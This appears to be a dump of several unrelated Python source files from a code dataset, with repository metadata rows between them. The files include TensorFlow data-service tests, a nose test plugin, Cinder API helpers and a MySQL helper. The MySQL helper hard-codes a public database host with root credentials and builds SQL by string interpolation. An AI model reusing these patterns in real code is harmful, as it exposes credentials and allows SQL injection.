#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.data service server lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
import tempfile
import threading
import unittest
from tensorflow.python.data.experimental.service import server_lib
from tensorflow.python.framework import errors
from tensorflow.python.platform import test
from tensorflow.python.profiler import profiler_client
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error: # pylint: disable=invalid-name
_portpicker_import_error = _error
portpicker = None
ASSIGNED_PORTS = set()
lock = threading.Lock()
def pick_unused_port():
  """Returns an unused and unassigned local port."""
  if _portpicker_import_error:
    raise _portpicker_import_error  # pylint: disable=raising-bad-type

  global ASSIGNED_PORTS
  with lock:
    # Keep sampling until portpicker hands us a high-numbered port that this
    # process has not already given out.
    while True:
      try:
        candidate = portpicker.pick_unused_port()
      except portpicker.NoFreePortFoundError:
        raise unittest.SkipTest("Flakes in portpicker library do not represent "
                                "TensorFlow errors.")
      if candidate <= 10000 or candidate in ASSIGNED_PORTS:
        continue
      ASSIGNED_PORTS.add(candidate)
      logging.info("Using local port %r", candidate)
      return candidate
class ServerLibTest(test.TestCase):
  """Lifecycle tests for tf.data service DispatchServer/WorkerServer:
  start, repeated start, stop, stop-then-start, join, worker counting and
  profiler connectivity."""

  def testStartDispatcher(self):
    dispatcher = server_lib.DispatchServer(start=False)
    dispatcher.start()

  def testStartDispatcherWithPortConfig(self):
    port = pick_unused_port()
    config = server_lib.DispatcherConfig(port=port)
    dispatcher = server_lib.DispatchServer(config=config, start=True)
    self.assertEqual(dispatcher.target, "grpc://localhost:{}".format(port))

  def testStartDispatcherWithWorkDirConfig(self):
    temp_dir = tempfile.mkdtemp()
    config = server_lib.DispatcherConfig(work_dir=temp_dir)
    dispatcher = server_lib.DispatchServer(  # pylint: disable=unused-variable
        config=config, start=True)

  def testStartDispatcherWithFaultTolerantConfig(self):
    temp_dir = tempfile.mkdtemp()
    config = server_lib.DispatcherConfig(
        work_dir=temp_dir, fault_tolerant_mode=True)
    dispatcher = server_lib.DispatchServer(  # pylint: disable=unused-variable
        config=config, start=True)

  def testStartDispatcherWithWrongFaultTolerantConfig(self):
    # Fault tolerant mode requires a work dir; expect a ValueError.
    config = server_lib.DispatcherConfig(fault_tolerant_mode=True)
    error = "Cannot enable fault tolerant mode without configuring a work dir"
    with self.assertRaisesRegex(ValueError, error):
      dispatcher = server_lib.DispatchServer(  # pylint: disable=unused-variable
          config=config, start=True)

  def testMultipleStartDispatcher(self):
    # Calling start() on an already-started server must be a no-op.
    dispatcher = server_lib.DispatchServer(start=True)
    dispatcher.start()

  def testStartWorker(self):
    dispatcher = server_lib.DispatchServer()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address), start=False)
    worker.start()

  def testStartWorkerWithPortConfig(self):
    dispatcher = server_lib.DispatchServer()
    port = pick_unused_port()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address, port=port), start=True)
    self.assertEqual(worker._address, "localhost:{}".format(port))

  def testMultipleStartWorker(self):
    dispatcher = server_lib.DispatchServer()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address), start=True)
    worker.start()

  def testStopDispatcher(self):
    # Stopping twice must be safe (idempotent).
    dispatcher = server_lib.DispatchServer()
    dispatcher._stop()
    dispatcher._stop()

  def testStopWorker(self):
    dispatcher = server_lib.DispatchServer()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address))
    worker._stop()
    worker._stop()

  def testStopStartDispatcher(self):
    dispatcher = server_lib.DispatchServer()
    dispatcher._stop()
    with self.assertRaisesRegex(
        RuntimeError, "Server cannot be started after it has been stopped"):
      dispatcher.start()

  def testStopStartWorker(self):
    dispatcher = server_lib.DispatchServer()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address))
    worker._stop()
    with self.assertRaisesRegex(
        RuntimeError, "Server cannot be started after it has been stopped"):
      worker.start()

  def testJoinDispatcher(self):
    dispatcher = server_lib.DispatchServer()
    dispatcher._stop()
    dispatcher.join()

  def testJoinWorker(self):
    dispatcher = server_lib.DispatchServer()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address))
    worker._stop()
    worker.join()

  def testDispatcherNumWorkers(self):
    dispatcher = server_lib.DispatchServer()
    self.assertEqual(0, dispatcher._num_workers())
    worker1 = server_lib.WorkerServer(  # pylint: disable=unused-variable
        server_lib.WorkerConfig(dispatcher._address))
    self.assertEqual(1, dispatcher._num_workers())
    worker2 = server_lib.WorkerServer(  # pylint: disable=unused-variable
        server_lib.WorkerConfig(dispatcher._address))
    self.assertEqual(2, dispatcher._num_workers())

  def testProfileWorker(self):
    dispatcher = server_lib.DispatchServer()
    worker = server_lib.WorkerServer(
        server_lib.WorkerConfig(dispatcher._address))
    # Test the profilers are successfully started and connected to profiler
    # service on the worker. Since there is no op running, it is expected to
    # return UnavailableError with no trace events collected string.
    with self.assertRaises(errors.UnavailableError) as error:
      profiler_client.trace(worker._address, tempfile.mkdtemp(), duration_ms=10)
    self.assertStartsWith(str(error.exception), "No trace event was collected")
# Standard TensorFlow test entry point: discover and run the tests above.
if __name__ == "__main__":
  test.main()
| 36.5 | 80 | 0.736073 |
ace08c8c74a58acc60920a499b2f8f600a63ebe4 | 8,430 | py | Python | pyon/util/pycc_plugin.py | ooici/pyon | 122c629290d27f32f2f41dafd5c12469295e8acf | [
"BSD-2-Clause"
] | 2 | 2015-06-09T16:07:09.000Z | 2015-07-28T10:06:31.000Z | pyon/util/pycc_plugin.py | ooici/pyon | 122c629290d27f32f2f41dafd5c12469295e8acf | [
"BSD-2-Clause"
] | 3 | 2020-07-22T15:14:55.000Z | 2021-12-13T19:35:06.000Z | pyon/util/pycc_plugin.py | ooici/pyon | 122c629290d27f32f2f41dafd5c12469295e8acf | [
"BSD-2-Clause"
] | null | null | null | # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Usage: From project root dir:
# bin/nosetests --with-pycc [your other options]
#
# If you want to use this plugin AND insulate plugin:
# bin/nosetests --with-insulate --insulate-in-slave=--with-pycc --insulate-show-slave-output [your other options]
#
# Read up on insulate: http://code.google.com/p/insulatenoseplugin/
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import time, os
import subprocess
import signal
import sys
from nose.plugins import Plugin
from putil.rabbithelper import clean_by_sysname
debug = sys.stderr
class PYCC(Plugin):
name = 'pycc'
    def __init__(self):
        """Initialize plugin state before nose calls options()/configure()."""
        Plugin.__init__(self)
        # Popen handles of spawned pycc container processes.
        self.ccs = []
        # Flipped to True by the SIGUSR1 handler installed in begin().
        self.container_started = False
        self.blames = {'state': [], 'events': [], 'resources': [], 'objects': []}
        self.last_blame = {}
        # System name shared between nose and the child container.
        self.sysname = None
        self.enablegb = False
def options(self, parser, env):
"""Register command line options"""
super(PYCC, self).options(parser, env=env)
parser.add_option('--pycc-rel', type='string', dest='pycc_rel',
help='Rel file path, res/deploy/r2deploy.yml by default',
default='res/deploy/r2deploy.yml')
parser.add_option('--pycc-enablegb', action='store_true', dest='enablegb',
default='False', help='Enable gevent block monitor')
    def configure(self, options, conf):
        """Configure the plugin and system, based on selected options."""
        super(PYCC, self).configure(options, conf)
        if self.enabled:
            # Deployment rel file and gevent-block-monitor flag come straight
            # from the --pycc-rel / --pycc-enablegb command line options.
            self.rel = options.pycc_rel
            self.enablegb = options.enablegb
    def begin(self):
        """Called before any tests are collected or run. Use this to
        perform any setup needed before testing begins.

        Boots pyon, wipes broker queues/exchanges and the datastore for this
        sysname, then spawns a child pycc container and blocks until it
        signals readiness via SIGUSR1.
        """
        # Make sure we initialize pyon before anything in this plugin executes
        from pyon.core import bootstrap
        if not bootstrap.pyon_initialized:
            bootstrap.bootstrap_pyon()

        try:
            from pyon.public import get_sys_name, CFG
            self.sysname = get_sys_name()

            # Clean exchanges and system queues out there
            try:
                connect_str = '-H %s -P 55672 -u %s -p %s -V %s' % (CFG.server.amqp.host,
                                                                    CFG.server.amqp.username,
                                                                    CFG.server.amqp.password,
                                                                    CFG.server.amqp.vhost)
                deleted_exchanges, deleted_queues = clean_by_sysname(connect_str, self.sysname)
                debug.write('Deleted exchanges:\n%s \n' % '\n'.join(deleted_exchanges))
                debug.write('Deleted queues:\n%s \n' % '\n'.join(deleted_queues))
            except Exception as e:
                # Broker cleanup is best-effort; failures here are ignored
                # deliberately so a missing management plugin doesn't abort
                # the whole test run.
                pass

            # Force datastore loader to use the same sysname
            # NOTE(review): DatastoreFactory is imported but never used here.
            from pyon.datastore.datastore_admin import DatastoreAdmin
            from pyon.datastore.datastore_common import DatastoreFactory
            self.datastore_admin = DatastoreAdmin(config=CFG)

            # Clean datastore and file system before pycc container starts
            from pyon.util.int_test import IonIntegrationTestCase
            IonIntegrationTestCase._force_clean(False)

            def die(signum, frame):
                # For whatever reason, the parent doesn't die some times
                # when getting KeyboardInterrupt. Hence this signal
                # handler.
                # Signal is pass through. The child pycc gets
                # its own KeyboardInterrupt and will shut down accordingly.
                debug.write('Received Keyboard Interrupt. Exiting now.\n')
                os._exit(9)

            signal.signal(signal.SIGINT, die)

            def no_zombie(signum, frame):
                # Debug to figure out who's dying
                debug.write('SIGCHLD received\n')
                stack = []
                while frame:
                    stack.append(frame)
                    frame =frame.f_back
                stack.reverse()
                for frame in stack:
                    debug.write('Frame %s in %s at line %s\n' %
                            (frame.f_code.co_name,
                                frame.f_code.co_filename, frame.f_lineno))
                debug.write('Child is dead...Clean up now so there is no zombie\n')
                (pid, status) = os.wait()
                exitstatus, signum = status & 0xff, (status & 0xff00) >> 8
                debug.write('Child pid %d with exit status %d and signum %d\n' % (pid, exitstatus, signum))
            # Could be dangerous. Comment this out.
            # signal.signal(signal.SIGCHLD, no_zombie)

            def container_started_cb(signum, frame):
                """Callback when child pycc service is ready"""
                self.container_started = True

            signal.signal(signal.SIGUSR1, container_started_cb)

            # Make sure the pycc process has the same sysname as the nose
            ccargs = ['bin/pycc', '-o', '--noshell', '-sp', '--sysname=%s' % self.sysname,
                      '--logcfg=res/config/logging.pycc.yml',
                      '--rel=%s' % self.rel,
                      "--config={'system': {'auto_bootstrap': True}}"]
            if self.enablegb:
                ccargs.insert(1, '-egb')
            debug.write('Starting pycc process: %s\n' % ' '.join(ccargs))

            # Set PYCC env var in case CEI needs to skip tests in pycc mode
            os.environ['PYCC_MODE'] = '1'
            # Enable CEI mode for the tests
            os.environ['CEI_LAUNCH_TEST'] = '1'
            newenv = os.environ.copy()
            po = subprocess.Popen(ccargs, env=newenv, close_fds=True)
            self.ccs.append(po)

            # Wait for container to be ready (busy-wait until the SIGUSR1
            # handler above flips the flag)
            while not self.container_started:
                time.sleep(0.2)
            debug.write('Child container is ready...\n')

            # Dump datastore
            self.datastore_admin.dump_datastore(path='res/dd')
            debug.write('Dump child container state to file...\n')

            # Clean again to make sure the first nosetest starts on a clean
            # slate
            self.datastore_admin.clear_datastore(prefix=self.sysname)

            debug.write('Start nose tests now...\n')
        except Exception as e:
            self.container_shutdown()
            raise e
def finalize(self, result):
"""Called after all report output, including output from all
plugins, has been sent to the stream. Use this to print final
test results or perform final cleanup. Return None to allow
other plugins to continue printing, or any other value to stop
them.
"""
self.container_shutdown()
self.datastore_admin.clear_datastore(prefix=self.sysname)
import subprocess
subprocess.call(['rm', '-rf', 'res/dd'])
def container_shutdown(self):
debug.write('Shut down cc process\n')
for cc in self.ccs:
pid = cc.pid
debug.write('\tClosing container with pid:%d\n' % pid)
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
    def beforeTest(self, test):
        # Expose the id of the test about to run so leftover datastore
        # objects can be blamed on it (see afterTest/report).
        os.environ['BLAME'] = test.id()
def afterTest(self, test):
blame = self.datastore_admin.get_blame_objects()
# Having a hard time detecting skips. Since skipped tests don't
# clean we should not save duplicate blames...
if blame != self.last_blame:
for key in blame.keys():
self.blames[key].extend(blame[key])
self.last_blame = blame
def report(self, stream):
stream.write('Blame Report on left over objects in couchd db\n')
stream.write('='* 20 + '\n')
for key, value in self.blames.items():
if value != []:
stream.write(key + ':\n')
stream.write('-'*20 + ':\n')
last_blame = None
for item in value:
blame = item['blame_']
if blame != last_blame:
stream.write(item['blame_'] + ':\n')
stream.write('\t' + str(item) + '\n')
last_blame = blame
| 41.323529 | 113 | 0.551483 |
ace08d7c9d90f98e9cae376c4894e4736db10a50 | 759 | py | Python | tests/filtering/test_filter_against_latest_blocks.py | Arachnid/web3.py | 4a0b4adc292981958c899ae731ee60014fd94775 | [
"MIT"
] | 4 | 2018-02-04T22:06:20.000Z | 2021-04-14T22:09:43.000Z | tests/filtering/test_filter_against_latest_blocks.py | gkapkowski/web3.py | cd0cf580119e4afa41c511eb35ee31840a2fd321 | [
"MIT"
] | null | null | null | tests/filtering/test_filter_against_latest_blocks.py | gkapkowski/web3.py | cd0cf580119e4afa41c511eb35ee31840a2fd321 | [
"MIT"
] | 1 | 2018-10-04T09:13:28.000Z | 2018-10-04T09:13:28.000Z | import random
import gevent
from flaky import flaky
@flaky(max_runs=3)
def test_filter_against_latest_blocks(web3_empty, wait_for_block, skip_if_testrpc):
    """A "latest" filter should report the hashes of freshly mined blocks."""
    web3 = web3_empty
    skip_if_testrpc(web3)

    observed_hashes = []
    block_filter = web3.eth.filter("latest")
    block_filter.watch(observed_hashes.append)

    start_block = web3.eth.blockNumber
    wait_for_block(web3, start_block + 3)

    # Poll with jitter until at least two hashes arrive, at most 5 seconds.
    with gevent.Timeout(5):
        while len(observed_hashes) < 2:
            gevent.sleep(random.random())

    block_filter.stop_watching(3)

    expected_hashes = [
        web3.eth.getBlock(n)['hash']
        for n in range(start_block + 1, start_block + 3)
    ]
    assert len(observed_hashes) >= 2
    assert set(expected_hashes).issubset(observed_hashes)
| 24.483871 | 89 | 0.706192 |
ace08ec36d526177c3769cc9e355cfecd8324e55 | 13,266 | py | Python | api/common.py | hybrid-storage-dev/cinder-fs-111t-hybrid-cherry | 86eb7e8b71c26bc39164fa18a9faa1065e4c1fc1 | [
"Apache-2.0"
] | null | null | null | api/common.py | hybrid-storage-dev/cinder-fs-111t-hybrid-cherry | 86eb7e8b71c26bc39164fa18a9faa1065e4c1fc1 | [
"Apache-2.0"
] | null | null | null | api/common.py | hybrid-storage-dev/cinder-fs-111t-hybrid-cherry | 86eb7e8b71c26bc39164fa18a9faa1065e4c1fc1 | [
"Apache-2.0"
] | null | null | null | # Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
import webob
from cinder.api.openstack import wsgi
from cinder.api import xmlutil
from cinder.i18n import _
from cinder.openstack.common import log as logging
from cinder import utils
# Config options controlling API pagination limits and the externally
# visible base URL used when building resource links.
api_common_opts = [
    cfg.IntOpt('osapi_max_limit',
               default=1000,
               help='The maximum number of items that a collection '
                    'resource returns in a single response'),
    cfg.StrOpt('osapi_volume_base_URL',
               default=None,
               help='Base URL that will be presented to users in links '
                    'to the OpenStack Volume API',
               deprecated_name='osapi_compute_link_prefix'),
]
CONF = cfg.CONF
CONF.register_opts(api_common_opts)
LOG = logging.getLogger(__name__)
# XML namespaces for the v1/v2 block-storage API serializers below.
XML_NS_V1 = 'http://docs.openstack.org/api/openstack-block-storage/1.0/content'
XML_NS_V2 = 'http://docs.openstack.org/api/openstack-block-storage/2.0/content'
# Regex that matches alphanumeric characters, periods, hyphens,
# colons and underscores:
# ^ assert position at start of the string
# [\w\.\-\:\_] match expression
# $ assert position at end of the string
VALID_KEY_NAME_REGEX = re.compile(r"^[\w\.\-\:\_]+$", re.UNICODE)
def validate_key_names(key_names_list):
    """Validate each item of the list to match key name regex.

    :param key_names_list: iterable of candidate key names
    :returns: True only when every name consists solely of word
              characters, periods, hyphens, colons or underscores
              (see VALID_KEY_NAME_REGEX); True for an empty list.
    """
    # all() short-circuits on the first invalid name, matching the
    # original early-return loop.
    return all(VALID_KEY_NAME_REGEX.match(key_name)
               for key_name in key_names_list)
def get_pagination_params(request):
    """Return marker, limit tuple from request.

    :param request: `wsgi.Request` possibly containing 'marker' and 'limit'
                    GET variables. 'marker' is the id of the last element
                    the client has seen, and 'limit' is the maximum number
                    of items to return. If 'limit' is not specified, 0, or
                    > max_limit, we default to max_limit. Negative values
                    for either marker or limit will cause
                    exc.HTTPBadRequest() exceptions to be raised.
    """
    query = request.GET
    params = {}
    if 'limit' in query:
        params['limit'] = _get_limit_param(request)
    if 'marker' in query:
        params['marker'] = _get_marker_param(request)
    return params
def _get_limit_param(request):
"""Extract integer limit from request or fail."""
try:
limit = int(request.GET['limit'])
except ValueError:
msg = _('limit param must be an integer')
raise webob.exc.HTTPBadRequest(explanation=msg)
if limit < 0:
msg = _('limit param must be positive')
raise webob.exc.HTTPBadRequest(explanation=msg)
return limit
def _get_marker_param(request):
    """Extract marker id from request or fail."""
    # Raises KeyError when 'marker' is absent; callers check membership
    # first (see get_pagination_params).
    return request.GET['marker']
def limited(items, request, max_limit=CONF.osapi_max_limit):
    """Return a slice of items according to requested offset and limit.

    :param items: A sliceable entity
    :param request: ``wsgi.Request`` possibly containing 'offset' and 'limit'
                    GET variables. 'offset' is where to start in the list,
                    and 'limit' is the maximum number of items to return. If
                    'limit' is not specified, 0, or > max_limit, we default
                    to max_limit. Negative values for either offset or limit
                    will cause exc.HTTPBadRequest() exceptions to be raised.
    :kwarg max_limit: The maximum number of items to return from 'items'
    """
    try:
        offset = int(request.GET.get('offset', 0))
    except ValueError:
        raise webob.exc.HTTPBadRequest(
            explanation=_('offset param must be an integer'))

    try:
        limit = int(request.GET.get('limit', max_limit))
    except ValueError:
        raise webob.exc.HTTPBadRequest(
            explanation=_('limit param must be an integer'))

    if limit < 0:
        raise webob.exc.HTTPBadRequest(
            explanation=_('limit param must be positive'))

    if offset < 0:
        raise webob.exc.HTTPBadRequest(
            explanation=_('offset param must be positive'))

    # A limit of 0 (or omitted) falls back to max_limit.
    limit = min(max_limit, limit or max_limit)
    return items[offset:offset + limit]
def limited_by_marker(items, request, max_limit=CONF.osapi_max_limit):
    """Return a slice of items according to the requested marker and limit.

    The slice starts just *after* the item whose id/uuid matches the
    marker; raises HTTPBadRequest when the marker matches nothing.
    """
    params = get_pagination_params(request)
    limit = params.get('limit', max_limit)
    marker = params.get('marker')
    limit = min(max_limit, limit)
    start_index = 0
    if marker:
        start_index = -1
        for i, item in enumerate(items):
            # NOTE(review): the 'flavorid' branch looks inherited from the
            # nova flavors API; confirm it is still needed for volumes.
            if 'flavorid' in item:
                if item['flavorid'] == marker:
                    start_index = i + 1
                    break
            elif item['id'] == marker or item.get('uuid') == marker:
                start_index = i + 1
                break
        if start_index < 0:
            msg = _('marker [%s] not found') % marker
            raise webob.exc.HTTPBadRequest(explanation=msg)
    range_end = start_index + limit
    return items[start_index:range_end]
def remove_version_from_href(href):
    """Removes the first api version from the href.

    Given: 'http://www.cinder.com/v1.1/123'
    Returns: 'http://www.cinder.com/123'

    Given: 'http://www.cinder.com/v1.1'
    Returns: 'http://www.cinder.com'
    """
    split_url = urlparse.urlsplit(href)
    segments = split_url.path.split('/', 2)

    # NOTE: this should match vX.X or vX
    version_re = re.compile(r'^v([0-9]+|[0-9]+\.[0-9]+)(/.*|$)')
    if version_re.match(segments[1]):
        del segments[1]

    stripped_path = '/'.join(segments)
    if stripped_path == split_url.path:
        msg = 'href %s does not contain version' % href
        LOG.debug(msg)
        raise ValueError(msg)

    rebuilt = list(split_url)
    rebuilt[2] = stripped_path
    return urlparse.urlunsplit(rebuilt)
def dict_to_query_str(params):
    """Serialize ``params`` into an unescaped ``key=val&key2=val2`` string.

    NOTE: values are intentionally NOT URL-encoded; callers rely on raw
    values being preserved.
    """
    # TODO(throughnothing): we should just use urllib.urlencode instead of this
    # But currently we don't work with urlencoded url's
    # items() (instead of the Python2-only iteritems()) keeps this working
    # on both Python 2 and 3, and join() avoids the trailing-'&' strip.
    return '&'.join('%s=%s' % (key, val) for key, val in params.items())
class ViewBuilder(object):
    """Model API responses as dictionaries.

    Subclasses set ``_collection_name`` and use the helpers below to build
    self/bookmark/next links for resources in that collection.
    """
    # Name of the REST collection (e.g. 'volumes'); set by subclasses.
    _collection_name = None
    def _get_links(self, request, identifier):
        """Return the standard self + bookmark link pair for a resource."""
        return [{"rel": "self",
                 "href": self._get_href_link(request, identifier), },
                {"rel": "bookmark",
                 "href": self._get_bookmark_link(request, identifier), }]
    def _get_next_link(self, request, identifier, collection_name):
        """Return href string with proper limit and marker params."""
        # Re-use the caller's query string, replacing only the marker.
        params = request.params.copy()
        params["marker"] = identifier
        prefix = self._update_link_prefix(request.application_url,
                                          CONF.osapi_volume_base_URL)
        url = os.path.join(prefix,
                           request.environ["cinder.context"].project_id,
                           collection_name)
        return "%s?%s" % (url, dict_to_query_str(params))
    def _get_href_link(self, request, identifier):
        """Return an href string pointing to this object."""
        prefix = self._update_link_prefix(request.application_url,
                                          CONF.osapi_volume_base_URL)
        return os.path.join(prefix,
                            request.environ["cinder.context"].project_id,
                            self._collection_name,
                            str(identifier))
    def _get_bookmark_link(self, request, identifier):
        """Create a URL that refers to a specific resource."""
        # Bookmark links are version-less by convention.
        base_url = remove_version_from_href(request.application_url)
        base_url = self._update_link_prefix(base_url,
                                            CONF.osapi_volume_base_URL)
        return os.path.join(base_url,
                            request.environ["cinder.context"].project_id,
                            self._collection_name,
                            str(identifier))
    def _get_collection_links(self, request, items, collection_name,
                              id_key="uuid"):
        """Retrieve 'next' link, if applicable.

        The next link is included if:
        1) 'limit' param is specified and equals the number of volumes.
        2) 'limit' param is specified but it exceeds CONF.osapi_max_limit,
           in this case the number of volumes is CONF.osapi_max_limit.
        3) 'limit' param is NOT specified but the number of volumes is
           CONF.osapi_max_limit.

        :param request: API request
        :param items: List of collection items
        :param collection_name: Name of collection, used to generate the
                                next link for a pagination query
        :param id_key: Attribute key used to retrieve the unique ID, used
                       to generate the next link marker for a pagination query
        :returns: links
        """
        links = []
        max_items = min(
            int(request.params.get("limit", CONF.osapi_max_limit)),
            CONF.osapi_max_limit)
        # A full page implies more results may exist -> emit a 'next' link.
        if max_items and max_items == len(items):
            last_item = items[-1]
            if id_key in last_item:
                last_item_id = last_item[id_key]
            else:
                last_item_id = last_item["id"]
            links.append({
                "rel": "next",
                "href": self._get_next_link(request, last_item_id,
                                            collection_name),
            })
        return links
    def _update_link_prefix(self, orig_url, prefix):
        """Swap scheme+netloc of ``orig_url`` for those of ``prefix``."""
        if not prefix:
            return orig_url
        url_parts = list(urlparse.urlsplit(orig_url))
        prefix_parts = list(urlparse.urlsplit(prefix))
        url_parts[0:2] = prefix_parts[0:2]
        return urlparse.urlunsplit(url_parts)
class MetadataDeserializer(wsgi.MetadataXMLDeserializer):
    """Deserialize a full ``<metadata>`` XML document into a metadata dict."""
    def deserialize(self, text):
        # safe_minidom_parse_string: project helper for parsing request XML
        # (assumed hardened against malicious input -- see cinder.utils).
        dom = utils.safe_minidom_parse_string(text)
        metadata_node = self.find_first_child_named(dom, "metadata")
        metadata = self.extract_metadata(metadata_node)
        return {'body': {'metadata': metadata}}
class MetaItemDeserializer(wsgi.MetadataXMLDeserializer):
    """Deserialize a single ``<meta>`` XML element into a one-item dict."""
    def deserialize(self, text):
        dom = utils.safe_minidom_parse_string(text)
        metadata_item = self.extract_metadata(dom)
        return {'body': {'meta': metadata_item}}
class MetadataXMLDeserializer(wsgi.XMLDeserializer):
    """XML deserializer for the metadata create/update/update_all actions."""
    def extract_metadata(self, metadata_node):
        """Marshal the metadata attribute of a parsed request."""
        if metadata_node is None:
            return {}
        metadata = {}
        # Each <meta key="k">v</meta> child becomes one dict entry.
        for meta_node in self.find_children_named(metadata_node, "meta"):
            key = meta_node.getAttribute("key")
            metadata[key] = self.extract_text(meta_node)
        return metadata
    def _extract_metadata_container(self, datastring):
        """Parse a whole <metadata> document into the wsgi body format."""
        dom = utils.safe_minidom_parse_string(datastring)
        metadata_node = self.find_first_child_named(dom, "metadata")
        metadata = self.extract_metadata(metadata_node)
        return {'body': {'metadata': metadata}}
    def create(self, datastring):
        """Deserialize body for a metadata create request."""
        return self._extract_metadata_container(datastring)
    def update_all(self, datastring):
        """Deserialize body for a metadata replace-all request."""
        return self._extract_metadata_container(datastring)
    def update(self, datastring):
        """Deserialize body for a single-item metadata update request."""
        dom = utils.safe_minidom_parse_string(datastring)
        metadata_item = self.extract_metadata(dom)
        return {'body': {'meta': metadata_item}}
# Default XML namespace map used by the metadata serializer templates.
metadata_nsmap = {None: xmlutil.XMLNS_V11}
class MetaItemTemplate(xmlutil.TemplateBuilder):
    """Serializer template for one ``<meta key="...">value</meta>`` element."""
    def construct(self):
        # Selector pulls the single (key, value) pair from the 'meta' dict;
        # index 0 is the key (attribute), index 1 the value (text).
        sel = xmlutil.Selector('meta', xmlutil.get_items, 0)
        root = xmlutil.TemplateElement('meta', selector=sel)
        root.set('key', 0)
        root.text = 1
        return xmlutil.MasterTemplate(root, 1, nsmap=metadata_nsmap)
class MetadataTemplateElement(xmlutil.TemplateElement):
    """Template element that always renders, even when metadata is empty."""
    def will_render(self, datum):
        # Render unconditionally so an empty <metadata/> element still
        # appears in the response.
        return True
class MetadataTemplate(xmlutil.TemplateBuilder):
    """Serializer template for a full ``<metadata>`` element."""
    def construct(self):
        root = MetadataTemplateElement('metadata', selector='metadata')
        # One <meta key="...">...</meta> child per (key, value) pair.
        elem = xmlutil.SubTemplateElement(root, 'meta',
                                          selector=xmlutil.get_items)
        elem.set('key', 0)
        elem.text = 1
        return xmlutil.MasterTemplate(root, 1, nsmap=metadata_nsmap)
ace08f42797c7838791f00880f0bf0eca4f36c92 | 1,318 | py | Python | web/models/base.py | 18645956947/TripleIE | 326e0844ed2cd167a084658bd89703ed94a6e484 | [
"MIT"
] | null | null | null | web/models/base.py | 18645956947/TripleIE | 326e0844ed2cd167a084658bd89703ed94a6e484 | [
"MIT"
] | 1 | 2019-04-02T06:51:07.000Z | 2019-04-02T11:14:38.000Z | web/models/base.py | 18645956947/TripleIE | 326e0844ed2cd167a084658bd89703ed94a6e484 | [
"MIT"
] | 1 | 2019-04-02T02:11:08.000Z | 2019-04-02T02:11:08.000Z | import json
import pymysql
class Base():
    """Thin helper that runs a single SQL statement against the kbqa MySQL db."""

    def __init__(self):
        pass

    def exec_sql(self, sql):
        """Execute ``sql`` and return rows as a list of dicts.

        :param sql: complete SQL statement (caller is responsible for
                    escaping -- see the security note below)
        :returns: list of {column_name: value} dicts, or '' when the
                  statement produced no rows (original contract preserved)
        """
        result = ''
        # SECURITY NOTE(review): credentials are hard-coded in source and the
        # raw SQL string is executed as-is; move credentials to config and
        # prefer parameterized queries for any user-supplied values.
        db = pymysql.connect(host='47.96.109.137',
                             port=3306,
                             user='root',
                             passwd='12345678',
                             db='kbqa',
                             charset='utf8')
        try:
            cursor = db.cursor()
            cursor.execute(sql)
            rs = cursor.fetchall()
            if rs:
                desc = cursor.description
                result = [dict(zip([col[0] for col in desc], row)) for row in rs]
            db.commit()
        finally:
            # BUG FIX: always release the connection -- the original leaked
            # it whenever execute() raised.
            db.close()
        return result
if __name__ == '__main__':
    # Ad-hoc smoke test: insert one sample question row.
    sqlModel = Base()
    question = '2018年上海的城镇人口'
    norm_questions = json.dumps({'normalize_question': []})
    triples = json.dumps({'triples': []})
    # SECURITY NOTE(review): values are interpolated straight into the SQL
    # string; use parameterized queries if any of them can come from users.
    insert_sql = ("INSERT INTO kb_questions (question,normalize_question,triples,create_time) "
                  "VALUES ('%s','%s','%s',NOW())" %
                  (question, norm_questions, triples))
    sqlModel.exec_sql(insert_sql)
    # rs = sqlModel.exec_sql("SELECT * FROM kb_questions WHERE id = 5")
    # print(rs[0]['triples'])
| 25.843137 | 95 | 0.506829 |
ace08f53e3cea356dbf977c47f51b8c30b76e6ca | 2,282 | py | Python | homeassistant/components/cover/homematic.py | kavyamahesh/home_assistant | fc06a6674691a99379e5928369b7973054498ee7 | [
"Apache-2.0"
] | 1 | 2020-08-14T15:01:33.000Z | 2020-08-14T15:01:33.000Z | homeassistant/components/cover/homematic.py | kavyamahesh/home_assistant | fc06a6674691a99379e5928369b7973054498ee7 | [
"Apache-2.0"
] | null | null | null | homeassistant/components/cover/homematic.py | kavyamahesh/home_assistant | fc06a6674691a99379e5928369b7973054498ee7 | [
"Apache-2.0"
] | 1 | 2020-08-26T20:54:14.000Z | 2020-08-26T20:54:14.000Z | """
The homematic cover platform.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/cover.homematic/
"""
import logging
from homeassistant.const import STATE_UNKNOWN
from homeassistant.components.cover import CoverDevice, ATTR_POSITION
from homeassistant.components.homematic import HMDevice, ATTR_DISCOVER_DEVICES
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['homematic']
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Set up the platform.

    Builds one HMCover per discovered Homematic device config and
    registers them with Home Assistant.
    """
    if discovery_info is None:
        return

    devices = []
    # FIX: the loop variable previously shadowed the ``config`` parameter;
